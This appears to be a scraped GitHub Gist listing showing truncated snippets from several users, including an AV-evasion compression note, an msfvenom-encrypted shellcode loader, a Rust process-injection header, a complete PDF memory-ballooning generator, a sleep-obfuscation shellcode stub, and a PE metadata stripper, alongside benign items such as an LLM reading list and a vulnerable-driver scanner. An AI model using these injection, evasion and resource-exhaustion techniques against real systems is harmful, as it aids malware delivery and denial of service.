@odzhan
odzhan / rdp_pack.cpp
Last active December 4, 2024 03:15
Compression using RDP API
/**
Compression using undocumented API in rdpbase.dll
RDPCompressEx supports four algorithms: MPPC-8K, MPPC-64K, NCRUSH and XCRUSH.
This code supports all except NCRUSH.
The MPPC compression ratio is very similar to LZSS, so this could be quite useful for shellcode trying to evade detection.
NCRUSH compression appears to work but fails for decompression.
@dadevel
dadevel / byorwx.cpp
Last active May 28, 2024 10:59
Bring your own RWX section
#include <cstdint>
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe
// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef
unsigned char buf[] =
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32"
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36"
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c"
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23"
@homanp
homanp / main.ts
Last active November 1, 2023 18:59
Superagent Github Researcher
// npm i superagentai-js
import { SuperAgentClient } from "superagentai-js";
const GITHUB_REPO_URL = "https://github.com/homanp/nagato";
const PROMPT = `You are a helpful AI assistant that's an expert at answering questions about the following Github repository: ${GITHUB_REPO_URL}\n\nAlways use the functions provided to answer all questions by the user.`;
interface Agent {
    id: string;
    name: string;
@veekaybee
veekaybee / normcore-llm.md
Last active October 22, 2025 08:37
Normcore LLM Reads

Anti-hype LLM reading list

Goals: Add links that are reasonable and good explanations of how stuff works. No hype and no vendor content if possible. Practical first-hand accounts of models in prod eagerly sought.

Foundational Concepts

Pre-Transformer Models

@aaaddress1
aaaddress1 / ExeMask.py
Last active April 24, 2025 05:28
Strip your personal compile info from Exe Files
import pefile, struct, sys
if len(sys.argv) != 2:
    print(f"Strip your personal compile info from Exe Files by aaaddress1@chroot.org")
    print(f"Usage: {sys.argv[0]} [path/to/exe]")
    sys.exit(-1)
# Rewrite from pefile: https://github.com/erocarrera/pefile/blob/593d094e35198dad92aaf040bef17eb800c8a373/pefile.py#L3402
def mask_myRichHdr(in_pefile):
    DANS = 0x536E6144  # 'DanS' as dword
@gm3197
gm3197 / vas.md
Last active September 26, 2025 22:12
Reverse Engineered Value Added Services Protocol Specification

Reverse Engineered VAS Protocol Specification

Research by Grayson Martin
Last Updated 7/8/23

Introduction

Value Added Services (VAS) is the protocol used by NFC capable passes in Apple Wallet. Access to this protocol is heavily restricted on both the device end (a special certificate issued by Apple is required to create these passes) and the reader end (NDA enforced confidentiality). As such, a desire arose to better understand the protocol in order to explore additional use cases and examine its cryptographic integrity. There are gaps in understanding in certain parts of this protocol; however, this document contains the minimum necessary understanding to automatically select, read data from, and decrypt a pass.

Importantly, this specification does not enable a malicious actor to read the data from a pass for which they do not have both the reader's private key, and the pass type identifier. Imp

/*
* Rust basic Process injection using OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread
* API dynamic resolution and shellcode XOR encoded
*/
#[allow(non_camel_case_types)]
type HANDLE = *mut u64;
#[allow(non_camel_case_types)]
type LPVOID = *mut u64;
#[allow(non_camel_case_types)]
type DWORD = u32;
@coldwaterq
coldwaterq / pdfExpander.py
Last active August 13, 2024 18:06
Make a new pdf that repeats the first page of test.pdf 4000 times, allowing for a file that is small but balloons to use a ton of memory
pdfcontent = open(r'test.pdf','rb').read()
loc = pdfcontent.index(b"\n2 0 obj\n<<")
loc = pdfcontent.index(b"[", loc)+2
loc2 = pdfcontent.index(b"R", loc)+2
page = pdfcontent[loc:loc2]
print(page)
pdfcontent = pdfcontent[:loc]+(page+b"\n")*4000+pdfcontent[loc2:]
countLoc = pdfcontent.index(b"\n/Count ")
endCountLoc = pdfcontent.index(b"\n",countLoc+1)
pdfcontent = pdfcontent[:countLoc]+pdfcontent[endCountLoc:]
@ConanChiles
ConanChiles / lolDrivers_FindMatches.ps1
Last active June 29, 2023 14:26
search local system for known lolDrivers
#Requires -Version 5.1
Set-StrictMode -Version 'latest'
$ErrorActionPreference = 'stop'
$DirPathDrivers = @(
'C:\WINDOWS\inf'
'C:\WINDOWS\System32\drivers'
'C:\WINDOWS\System32\DriverStore\FileRepository'
)
@susMdT
susMdT / shitcode.c
Last active December 2, 2024 04:25
hahaha da shellcode go brrrr
#include <Core.h>
#include <Win32.h>
#include <Structs.h>
#include <Sleep.h>
#include <Utils.h>
SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance)
{